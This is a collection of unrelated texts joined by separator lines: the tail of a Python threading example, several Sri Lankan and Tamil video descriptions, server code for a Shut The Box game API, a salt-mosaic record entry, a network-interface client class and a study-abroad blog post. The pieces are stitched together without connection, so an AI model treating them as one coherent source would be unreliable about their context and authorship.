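threads = [threading.Thread(target=lambda: [bump() for _ in range(1000)])
           for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter["n"])  # 4000
```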
|
Kana Mutti - Wasthi Productions "වස්ති"
Uploaded by Ganga Video Team. To view more new live shows, please subscribe to our "Ganga Video Team" YouTube channel. Shows recorded by Ganga Video Team can be watched in crisp HD on our Ganga Video Team channel. Subscribe to our YouTube channel to watch the latest music shows.
https://lrnews.ch/ https://www.facebook.com/lrnews.ch/ I'm D.M. Thushara Jayarathna, and I studied at Ananda Sastralaya, Kotte. I work as an investigative web journalist. For my higher studies, I joined the Management Faculty of Sabaragamuwa University as a management student, and after that I joined Sri Lanka Law College as a law student. I won the gold medal in the jury-address competition and was the captain of the Law College debating team. I am the one who filed a complaint against Mr. Namal Rajapaksha, son of former president Mr. Mahinda Rajapaksha, regarding cheating in the Law College examination. After that incident, I faced political problems and life threats. For this reason, I left my country in 2012, and I currently live in Switzerland. I have dedicated my life to establishing democracy and the rule of law in my country.
Through this video we do not intend to support or disparage any person, political party, or group; it is simply a creation made for entertainment, showing only how Sri Lankans who love cricket see present-day cricket. Thank you.
Nirasha | Episode 95 Watch ITN Programmes & More Updates at http://www.itntv.lk #ITN #ITNSriLanka #Nirasha #Episode95 ITN ON SOCIAL Follow on Facebook : https://www.facebook.com/ITNSriLanka Follow on Twitter : https://www.twitter.com/ITNSriLanka Subscribe on YouTube: http://bit.ly/SubscribeITNSriLanka © 2018 by Independent Television Network. All rights reserved. No part of this video may be reproduced or transmitted in any form or by any means, electronic, mechanical, recording, or otherwise, without prior written permission of Independent Television Network.
#MounaRaagam #VijayTV #VijayTelevision #StarVijayTV #StarVijay #TamilTV #RedefiningEntertainment #Sakthi #SakthiVelan Mouna Raagam | Monday to Saturday at 7:30 PM on your Vijay. Click here http://www.hotstar.com/tv/mouna-raagam/13874 to watch the show on hotstar.
|
"""main.py - This file creates and configures the Google Cloud Endpoints
for the ShutTheBox game, and contains part of the game logic and statistical
methods."""
import endpoints
from protorpc import remote, messages, message_types
from google.appengine.ext import ndb
from google.appengine.api import memcache
import logging
from models import User, Game, Turn
# Forms for doing the CRUD on the database
from models import CreateUserRequestForm, CreateUserResultForm
from models import EmailNotificationRequestForm, EmailNotificationResulForm
from models import NewGameRequestForm, NewGameResultForm
from models import TurnRequestForm, TurnResultForm
from models import CancelResultForm
# These next forms just read data
from models import FindGamesRequestForm, TotalFindGamesResultForm
from models import UserStatsRequestForm, UserStatsResultForm
from models import HighScoresRequestForm, TotalHighScoresResultForm
from models import LeaderboardRequestForm, UserLeaderboardResultForm, \
TotalLeaderboardResultForm
from models import AllTurnsReportResultForm
from utils import get_by_urlsafe
from collections import namedtuple
from operator import attrgetter
import pickle
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# from models import InsertOrDeleteDataRequestForm, InsertOrDeleteDataResultForm
# INSERT_OR_DELETE_REQUEST = endpoints.ResourceContainer(
# InsertOrDeleteDataRequestForm)
# import json
# import requests as outside_requests
# import random
CREATE_USER_REQUEST = endpoints.ResourceContainer(CreateUserRequestForm)
EMAIL_NOTIFICATION_REQUEST = endpoints.ResourceContainer(
EmailNotificationRequestForm)
NEW_GAME_REQUEST = endpoints.ResourceContainer(NewGameRequestForm)
# Adding urlsafe_key like this makes it a required parameter and passes it as
# a path parameter in the URL
TURN_REQUEST = endpoints.ResourceContainer(TurnRequestForm,
urlsafe_key=messages.StringField(1))
URLSAFE_KEY_REQUEST = endpoints.ResourceContainer(
urlsafe_key=messages.StringField(1))
FIND_GAMES_REQUEST = endpoints.ResourceContainer(FindGamesRequestForm)
USER_STATS_REQUEST = endpoints.ResourceContainer(UserStatsRequestForm)
HIGH_SCORES_REQUEST = endpoints.ResourceContainer(HighScoresRequestForm)
LEADERBOARD_REQUEST = endpoints.ResourceContainer(LeaderboardRequestForm)
@endpoints.api(name='shut_the_box', version='v1')
class ShutTheBoxApi(remote.Service):
"""A set of methods implementing the gameplay of the classic British pub
game Shut The Box. The entire game is implemented on the server-side
through Google's Cloud Endpoints. The state of a game is remembered by
passing an individual game's entity key to the client, serving as a state
token."""
# First 4 APIs are functional and actually do things
@endpoints.method(request_message=CREATE_USER_REQUEST,
response_message=CreateUserResultForm,
path='create_user',
name='create_user',
http_method='POST')
def create_user(self, request):
"""Creates a User.
:param username (req): A unique username without leading spaces.
:type username: string
:param email (opt): A unique and valid email. Email is validated using
MAILGUN email validation API.
:type email: string
:param email_notification (opt): True by default. If True, user will
receive email notifications of outstanding active games.
:type email_notification: boolean
:returns message: A message confirming user was created, or an error
message.
:rtype message: string
:raises: ConflictException"""
# Some format checking
if not request.username:
raise endpoints.ConflictException(
'User name cannot be null')
if len(request.username) != len(request.username.lstrip(' ')):
raise endpoints.ConflictException(
'User name can not have leading spaces')
if request.username.isspace():
raise endpoints.ConflictException(
'User name cannot be null')
# Checking for duplicate entries
if User.query(User.username == request.username).get():
raise endpoints.ConflictException(
'A user with the name {} already exists!'.
format(request.username))
# Only check if email is valid if there is an email to check
if request.email:
if User.query(User.email == request.email).get():
raise endpoints.ConflictException(
'A user with the email {} already exists!'.
format(request.email))
# Checking if the email is valid via MAILGUN APIs
if not User.is_email_valid(request.email):
return CreateUserResultForm(
message="Email address invalid! User is not created.")
# All is good, saving User object
user = User(
username=request.username,
email=request.email,
email_notification=request.email_notification)
user.put()
else:
user = User(username=request.username)
user.put()
return CreateUserResultForm(message='User {} created!'.
format(request.username))
@endpoints.method(request_message=EMAIL_NOTIFICATION_REQUEST,
response_message=EmailNotificationResulForm,
path='email_notification',
name='email_notification',
http_method='POST')
def set_email_notification_preference(self, request):
"""Allows a user to change their email notification preference.
:param username (req): A unique username without leading spaces.
:type username: string
:param email_notification (req): If True, user will receive email
notifications of outstanding active games that haven't been played in
the last 12 hours. If False, users will stop receiving these
notifications.
:type email_notifications: boolean
:returns message: A message confirming email notification preference,
or an error.
:rtype message: string"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
user.email_notification = request.email_notification
user.put()
        return EmailNotificationResulForm(message="Email notification "\
            "preferences set to {}".format(request.email_notification))
@endpoints.method(request_message=NEW_GAME_REQUEST,
response_message=NewGameResultForm,
path='new_game',
name='new_game',
http_method='POST')
def new_game(self, request):
"""Creates a new game and returns the game's urlsafe key.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (req): Number of tiles to play Shut The Box with.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (req): When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns username: User's username.
:rtype username: string
:returns number_of_tiles: Number of tiles to play Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns urlsafe_key: This serves as the state token for a game of Shut
The Box.
:rtype urlsafe-key: string
:returns message: A helpful message or an error message.
:rtype message: string
:raises: NotFoundException, ConflictException"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
if not request.number_of_tiles or not request.dice_operation:
raise endpoints.ConflictException(
'User must specify the number of tiles and the dice operation')
game = Game.new_game(user.key, request.number_of_tiles.number,
request.dice_operation.name)
        return game.to_new_game_result_form("Good luck playing Shut The "\
            "Box, {}!".format(user.username))
@endpoints.method(request_message=TURN_REQUEST,
response_message=TurnResultForm,
path='game/{urlsafe_key}',
name='turn',
http_method='PUT')
def turn(self, request):
"""Plays one turn of Shut The Box.
        To play Shut The Box, first call turn() with only a urlsafe_key and
        flip_tiles null. It returns a roll and a full set of tiles.
Each subsequent call of turn() must include both a urlsafe_key and
flip_tiles, and turn() will determine the validity of flip_tiles and
compute the next roll. The goal is to flip all the tiles and get the
lowest score possible.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:param flip_tiles (opt): Leave this parameter null for the first call of
turn(). On subsequent calls, flip_tiles are the integers to be
flipped in response to the roll.
:type flip_tiles: list of non-negative integers
:returns urlsafe_key: The same urlsafe_key passed in.
:rtype urlsafe_key: string
:returns roll: A list of two integers, each between 1-6, if there are
active tiles above 7 in play. If all tiles above 7 are inactive only
one integer is returned.
:rtype roll: list of non-negative integers
:returns active_tiles: The newly computed active_tiles left after the
roll has been played.
:rtype active_tiles: A list of non-negative integers
:returns valid_move: True if flip_tiles played are valid, False if they
are not valid.
:rtype valid_move: boolean
:returns score: A running score of the active_tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over.
:rtype game_over: boolean
:returns message: A helpful message or an error message.
:rtype message: string
:raises: BadRequestException, ValueError"""
# First make sure the game's key is real/not game over status
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
form = TurnResultForm()
form.urlsafe_key = request.urlsafe_key
form.valid_move = False
form.game_over = True
form.message = "This game is already over. Play again by calling "\
"new_game()!"
return form
# If it's a real game, get the most recent turn
MEMCACHE_KEY = game.key.urlsafe()
recent_turn = game.most_recent_turn()
if not recent_turn:
# If recent_turn is null, this is the first roll!
turn = Turn.first_turn(game)
if not memcache.add(key=MEMCACHE_KEY, value=pickle.dumps(turn),
time=360):
logging.warning("Memcache addition failed!")
return turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
# If it's not a user's first turn, user must pass in flip_tiles
if not request.flip_tiles:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message="User must pass in values to flip_tiles!")
# Check if it's a valid flip
error = recent_turn.invalid_flip(request.flip_tiles,
game.dice_operation)
if error:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message=error)
# Since it's a valid flip, end the last turn
recent_turn.end_turn()
# Create a new turn
new_turn = recent_turn.new_turn(game, request.flip_tiles)
# If the new turn does not have any active tiles, it's a perfect score
# and the game's over
if not new_turn.active_tiles:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Perfect score! Call new_game() to play again!")
# Check if the roll from the new turn ends the game
game_over = new_turn.is_game_over(game)
if game_over:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Call new_game() to play again!")
# If the code's fallen through to here, the roll is valid. Add newest turn to memcache
if not memcache.replace(key=MEMCACHE_KEY, value=pickle.dumps(new_turn),
time=360):
            logging.warning("Memcache replacement failed!")
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=CancelResultForm,
path='cancel_game/{urlsafe_key}',
name='cancel_game',
http_method='DELETE')
def cancel_game(self, request):
"""Cancels a Game entity and its children Turn entities. User can
        only cancel games in progress. This API operates under the assumption
that it's better to just cancel games outright instead of somehow
marking them as deleted in the database.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:returns cancelled: True if the game entity and Turn entities are
deleted from the datastore; False if the game entity in question is
completed.
:rtype cancelled: boolean
:returns error: Helpful error message.
:rtype error: string
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
return CancelResultForm(
cancelled=False,
error="Can't cancel games that are already completed.")
# This deletes both the parent game and the children turns
ndb.delete_multi(ndb.Query(ancestor=game.key).iter(keys_only=True))
return CancelResultForm(cancelled=True)
# The next APIs are statistics, game state information, and leaderboards
# They don't create, update, or delete the database, they just read from
# it
# The rubric calls for a method get_user_games, but I expanded this API to
# have that functionality and more
@endpoints.method(request_message=FIND_GAMES_REQUEST,
response_message=TotalFindGamesResultForm,
path='find_games',
name='find_games',
http_method='POST')
def find_games(self, request):
"""Searches for games matching the passed in search criteria and
returns basic information about them.
Will return an error if both games_in_progress and finished_games are
True.
:param games_in_progress (opt): False by default. If True, filters by
games in progress.
:type games_in_progress: boolean
:param finished_games (opt): False by default. If True, filters by
finished games.
:type finished_games: boolean
:param number_of_tiles (opt): Filters games by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters games by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): Filters by username.
:type username: string
:returns games: A list of games. Each game is made up of the parameters
below.
:rtype games: list
:returns urlsafe_key: The state token for this game of Shut The Box.
:rtype urlsafe_key: string
:returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns game_over: If True, this game is over.
:rtype game_over: boolean
:returns turns_played: Number of turns played for this game.
:rtype turns_played: integer
:raises: NotFoundException, BadRequestException"""
# if username is passed in, look for only their games
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
else:
games_query = Game.query()
if request.games_in_progress == True \
and request.finished_games == True:
            raise endpoints.BadRequestException("find_games can't be called "
                "with both parameters games_in_progress and finished_games "
                "True")
if request.games_in_progress:
games_query = games_query.filter(Game.game_over == False)
if request.finished_games:
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
# Return the most recent games first
games_query = games_query.order(-Game.timestamp)
games = games_query.fetch()
return TotalFindGamesResultForm(
games=[game.to_find_games_result_form() for game in games])
@endpoints.method(request_message=USER_STATS_REQUEST,
response_message=UserStatsResultForm,
path='user_stats',
name='user_stats',
http_method='POST')
def get_user_stats(self, request):
"""Returns user statistics for a particular user.
The statistics are completed games, total score, total turns, average
score, and average turns. Able to filter by dice operation and number
of dice.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (opt): If specified, filters to return games
with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to return games
with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns total_score: Total score of completed games.
:rtype total_score: integer
        :returns total_turns: Total number of turns for completed games.
        :rtype total_turns: integer
        :returns average_score: Average score from completed games, rounded
        to 3 decimal places.
        :rtype average_score: float
        :returns average_turns: Average turns from completed games, rounded
        to 3 decimal places.
:rtype average_turns: float
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
# TODO: For the life of me, I could not figure out how to make this
# method into a GET request with multiple query parameters (username,
# number_of_dice, dice_operation). I was able to figure out how to
# do it with one parameter, but not multiple. And the google
# tutorial only features GETs with 1 parameter.
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob
# /master/appengine/standard/endpoints/backend/main.py
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
# Only return games that have a status of game_over
games_query = games_query.filter(Game.game_over == True)
# Optional filters
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
if not games:
return UserStatsResultForm(message="No games found!")
(games_completed, total_score, total_turns,
average_score, average_turns) = Game.games_stats(games)
form = UserStatsResultForm(
games_completed=games_completed,
total_score=total_score,
total_turns=total_turns,
average_score=average_score,
average_turns=average_turns)
return form
@endpoints.method(request_message=HIGH_SCORES_REQUEST,
response_message=TotalHighScoresResultForm,
path='high_scores',
name='high_scores',
http_method='POST')
def get_high_scores(self, request):
"""Returns a list of high scores. In Shut The Box, lower scores are
better, so a list of high scores is a list of the scores from lowest to
highest. In the case of a tie, order is determined by which game
finished first.
The high scores are able to be filtered by dice_operation or
number_of_tiles.
:param number_of_tiles (opt): If specified, filters to
return games with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to
return games with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param number_of_results (opt): Number of high scores to return
:type number_of_results: integer. DEFAULT=20
:returns high_scores: List of games ordered by high scores. Each game
contains the parameters below.
:rtype high_score: list
:returns score: The final score.
:rtype score: integer
:returns username: The user who played this game.
:rtype username: string
        :returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns timestamp: The date and time when the game was completed.
:rtype timestamp:
:returns message: Helpful error message
:rtype message: string
:raises: BadArgumentError"""
if request.number_of_results < 0:
return TotalHighScoresResultForm(message="number_of_results must "\
"not be below 0!")
# Order by the most recent lowest score
games_query = Game.query()
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games_query = games_query.order(Game.final_score, -Game.timestamp)
games = games_query.fetch(limit=request.number_of_results)
if not games:
return TotalHighScoresResultForm(message="No games match criteria!")
return TotalHighScoresResultForm(
high_scores=[game.to_high_scores_result_form() for game in games])
@endpoints.method(request_message=LEADERBOARD_REQUEST,
response_message=TotalLeaderboardResultForm,
path='leaderboard',
name='leaderboard',
http_method='POST')
def get_leaderboard(self, request):
"""List of ranked users. Users are ranked by average_score from low
to high, and in the case of a tie in average score, the rank is
determined by lowest average_turns.
Users are only able to be ranked if they have completed 5 or more
games. The leaderboard is able to be filtered by dice operation and/or
number of tiles.
:param number_of_tiles (opt): Filters leaderboard by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters leaderboard by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): If specified returns rank of only that user.
:type username: string
:returns ranked_users: List of users ordered by rank. Each user is
made up of the parameters below.
:rtype ranked_users: list
:returns username: A unique username.
:rtype username: string
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns total_turns: Total number of turns for completed games.
:rtype total_turns: integer
:returns average_score: Average score from completed games.
:rtype average_score: float
:returns average_turns: Average turns from completed games.
:rtype average_turns: float
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns rank: Rank of the user.
:rtype rank: integer
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
users = User.query().fetch()
if not users:
return TotalLeaderboardResultForm(message="No users created yet!")
# Create an empty leaderboard list. It will be filled with instances
# of the UserStats named tuple
leaderboard = []
UserStats = namedtuple('UserStats',
['total_score', 'average_score', 'average_turns',
'games_completed', 'username'])
for user in users:
games_query = Game.query(ancestor=user.key)
# Only use games that are over
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
# If this user has played less than 5 games, don't rank them. Must
# complete 5 or more games to become ranked, due to the nature of
# ranking in Shut The Box. It would be too easy for one user to
# play one game, get a perfect score, and then suddenly overtake
# the leaderboard
if len(games) < 5:
continue
(games_completed, total_score, total_turns, average_score,
average_turns) = Game.games_stats(games)
user_stats = UserStats(total_score, average_score,
average_turns, games_completed, user.username)
leaderboard.append(user_stats)
# if no users have completed games quit early
if not leaderboard:
return TotalLeaderboardResultForm(message="No rankable users "\
"yet!")
# Now to sort the results in this specific way
leaderboard.sort(key=attrgetter('average_score', 'average_turns',
'username'))
# Now to assign rank on the already sorted leaderboard list. It's not
# as simple as just using enumerate because of possible ties
rank = 0
last_average_score = -1
last_average_turns = -1
for n, user in enumerate(leaderboard):
rank += 1
# Take into account the tie scenario
if user.average_score == last_average_score and \
user.average_turns == last_average_turns:
rank -= 1
# Need to put the UserStats object in a list so append will work
leaderboard[n] = [leaderboard[n]]
leaderboard[n].append(rank)
# Save off the last ranked user's statistics
last_average_score = user.average_score
last_average_turns = user.average_turns
# If username is specified, make that the only result in the leaderboard
if request.username:
for ranked_user in leaderboard:
if ranked_user[0].username == request.username:
leaderboard = [ranked_user]
if leaderboard[0][0].username != request.username:
return TotalLeaderboardResultForm(
message="{} is not ranked yet!".format(request.username))
# Now loop through the leaderboard one last time and put the content
# into a form
forms = []
for ranked_user in leaderboard:
user_stats = ranked_user[0]
rank = ranked_user[1]
leaderboard_form = UserLeaderboardResultForm(
username=user_stats.username,
average_score=user_stats.average_score,
average_turns=user_stats.average_turns,
total_score=user_stats.total_score,
games_completed=user_stats.games_completed,
rank=rank)
forms.append(leaderboard_form)
return TotalLeaderboardResultForm(ranked_users=forms)
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=AllTurnsReportResultForm,
path='game_history',
name='game_history',
http_method='POST')
def get_game_history(self, request):
"""Returns the history of moves for the game passed in, allowing game
progression to be viewed move by move.
:param urlsafe_key (req): This is the urlsafe_key returned
from calling new_game(). It serves as the state token for a single
game of Shut The Box.
:type urlsafe_key: string
:returns turns: A list of turns for a specific game. Each turn contains
the parameters below.
:rtype turns: list
:returns turn: The turn number.
:rtype turn: integer
:returns roll: The dice roll for that turn.
:rtype roll: list of non-negative integers
:returns tiles_played: The tiles flipped that turn.
:rtype tiles_played: a list of non-negative integers.
:returns score: A running total of the active tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over. If False,
more turns can be played.
:rtype game_over: boolean
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
turns = Turn.query(ancestor=game.key).order(Turn.timestamp).fetch()
# Not all the information is present in the turns object for the game
# history report. We need to manipulate the active tiles so that it
# stores the tiles played, not the tiles on the board. To do that
# we loop through the turns and calculate the difference between the
# active tiles present in the last turn vs the active tiles in the
# current turn. We use python sets and set.difference to repurpose
# active_tiles. We also store the score of each turn in this new
# active_tiles because you wouldn't be able to calculate it anymore
# with active_tiles being repurposed.
# Ex:
# Before:
# Loop 1: active_tiles: [1,2,3,4,5,6,7,8,9]
# Loop 2: active_tiles: [1,2,3,4,5,6,7,8]
# Loop 3: active_tiles: [1,2,3,6,7,8]
#
# After:
# Loop 1: active_tiles: [45, []]
# Loop 2: active_tiles: [36, [9]]
# Loop 3: active_tiles: [27, [4,5]]
for turn in turns:
# set last_turn explicitly in the first loop
if turn.turn == 0:
last_turn = set(turn.active_tiles)
current_turn = set(turn.active_tiles)
tiles_played = list(last_turn.difference(current_turn))
# Set last_turn now for the next loop
last_turn = set(turn.active_tiles)
# Now we are going to repurpose turn.active_tiles to store the
# score and the tiles played
score = sum(turn.active_tiles)
turn.active_tiles = []
turn.active_tiles.append(score)
turn.active_tiles.append(tiles_played)
return AllTurnsReportResultForm(
turns=[turn.to_turn_report_result_form() for turn in turns])
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# @endpoints.method(request_message=INSERT_OR_DELETE_REQUEST,
# response_message=InsertOrDeleteDataResultForm,
# path='test_method',
# name='test_method',
# http_method='POST')
# def test_method(self, request):
# if request.delete_everything:
# users = User.query().iter(keys_only=True)
# ndb.delete_multi(users)
# games = Game.query().iter(keys_only=True)
# ndb.delete_multi(games)
# turns = Turn.query().iter(keys_only=True)
# ndb.delete_multi(turns)
# return InsertOrDeleteDataResultForm(message="All Users, Games, "\
# "Turns deleted!")
# # some setup for creating request for new games
# version = "v1"
# port = 8080
# base_url = "http://localhost:{}/_ah/api/shut_the_box/{}/".\
# format(port, version)
# new_game_url = base_url + "new_game"
# # some setup for creating the games
# DICE_OPERATION = ["ADDITION", "MULTIPLICATION"]
# NUMBER_OF_TILES = ["NINE", "TWELVE"]
#
# with open("pkg/test_data.JSON") as data_file:
# json_data = json.load(data_file)
# users = json_data["users"]
# turns = json_data["turns"]
# for user in users:
# new_user = User(
# username=user["username"],
# email=user["email"])
# new_user.put()
# # Now to create the games
# for user in users:
# for n in range(20): # create 20 games per user
# dice_operation = random.choice(DICE_OPERATION)
# number_of_tiles = random.choice(NUMBER_OF_TILES)
# create_json = [{
# "dice_operation": dice_operation,
# "number_of_tiles": number_of_tiles,
# "username": user["username"]}]
# outside_request = outside_requests.post(
# url=new_game_url, params=create_json[0])
# raw_urlsafe_key = outside_request.json()["urlsafe_key"]
# game_entity = get_by_urlsafe(raw_urlsafe_key, Game)
# turn_list = random.choice(turns.get(
# dice_operation + number_of_tiles))
# for turn in turn_list.get("turn_list"):
# new_turn = Turn(
# key=Turn.create_turn_key(game_entity.key),
# active_tiles=turn.get("active_tiles"),
# roll=turn.get("roll"),
# turn=turn.get("turn"))
# if turn.get("turn_over"):
# new_turn.turn_over = turn.get("turn_over")
# if turn.get("game_over"):
# new_turn.game_over = turn.get("game_over")
# new_turn.put()
# final_score = turn_list.get("final_score")
# if final_score is not None:
# game_entity.final_score = final_score
# game_entity.game_over = True
# game_entity.put()
# return InsertOrDeleteDataResultForm(message="Data added "\
# "successfully!")
|
The Largest Salt Mosaic by a Team measured 600 Square meters and was created by 3366 participants of M/s. A.R.J Group of Institutions at M/s. A.R.J Public School (CBSE), Mannargudi, Thiruvarur District, Tamil Nadu, India on 9th March 2012. The Mosaic was completed in 5 Hours and the concept was “Save Water for Future”.
|
from netrackclient import errors
from netrackclient.netrack.v1 import constants
import collections
import ipaddress
_Network = collections.namedtuple("Network", [
"encapsulation",
"address",
"interface",
"interface_name",
])
class Network(_Network):
def __new__(cls, **kwargs):
kwargs = dict((k, kwargs.get(k)) for k in _Network._fields)
return super(Network, cls).__new__(cls, **kwargs)
class NetworkManager(object):
def __init__(self, client):
super(NetworkManager, self).__init__()
self.client = client
def _url(self, datapath, interface):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces/{interface}"
return url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath,
interface=interface)
def _encapsulation(self, address):
#TODO: add support of other protocols
network = ipaddress.ip_interface(address)
return "ipv{0}".format(network.version)
def update(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.put(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
def get(self, datapath, interface):
try:
response = self.client.get(self._url(
datapath=datapath,
interface=interface,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
return Network(**response.body())
def list(self, datapath):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces"
url = url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath)
try:
response = self.client.get(url)
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
interfaces = []
for interface in response.body():
interfaces.append(Network(**interface))
return interfaces
def delete(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.delete(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
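The encapsulation name that NetworkManager derives from an interface address can be demonstrated in isolation (a minimal sketch of the `_encapsulation` logic, using only the stdlib ipaddress module):

```python
# Standalone sketch of NetworkManager._encapsulation: derive the
# encapsulation name ("ipv4" / "ipv6") from an interface address.
import ipaddress

def encapsulation(address):
    network = ipaddress.ip_interface(address)
    return "ipv{0}".format(network.version)

print(encapsulation("192.168.0.1/24"))   # ipv4
print(encapsulation("2001:db8::1/64"))   # ipv6
```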
|
Today I am thrilled to welcome a friend of mine from high school who had an amazing experience while studying abroad in Florence, Italy for the summer. She is sharing her top tips for making the most of your summer study abroad! Without further ado, I present Ali from Sustainable Psyche.
If you’re interested in traveling and studying abroad but you’re not ready to commit to an entire year or even a semester program, a summer abroad might be the perfect opportunity for you. Considering that summer flies by in the blink of an eye, it takes a little bit of planning in order to create the best possible experience abroad.
In the summer of 2013 I did a study abroad program in Florence, Italy. It was one of the best decisions I ever made and it truly impacted my life in so many positive ways. Here’s some of my advice on how to make the most of a summer program.
Use the weekends to travel. During the week dedicate yourself to your studies and to getting to know the city that you’re living in. Go out to dinner, take evening walks and just wander during your free time in the week. On the weekends, on the other hand, travel elsewhere. Plan weekend trips within the country where you’re studying or check out cheap flights or trains to travel more economically to other nearby places. You really can do a lot. I jam packed my five available weekends by visiting more than fifteen other Italian cities including Milano, the island of Capri, Naples, Cinque Terre and Pisa.
Explore to the max. Wandering and finding random hidden gems can be the most rewarding. If you have the opportunity to visit museums or take short field trips through your study abroad program, don’t ever say no. Take all the chances to experience the new culture, sights, and food. Take the time to enjoy and mindfully take in what you are doing.
Embrace the fact that you are indeed a tourist and that it is okay to be one every once in a while. Visit all of your city's touristy places at least once.
Some of the most wonderful friendships can be created even in a short time. Get to know your fellow classmates right away so that you have friends to travel with on the weekends. If your school is an international school, try making friends with people from different cultures or from the country where you are residing. It’s truly a beautiful thing to maintain international friendships long after you return home.
A summer is way too short to become fluent in any language but knowing the basics and maybe taking a course before arriving will give you a boost. You will feel so much less like a foreigner and you will find that it's very handy to know how to ask for directions or to read a menu. This is a great way to immerse yourself in the culture and add another dimension to your experience.
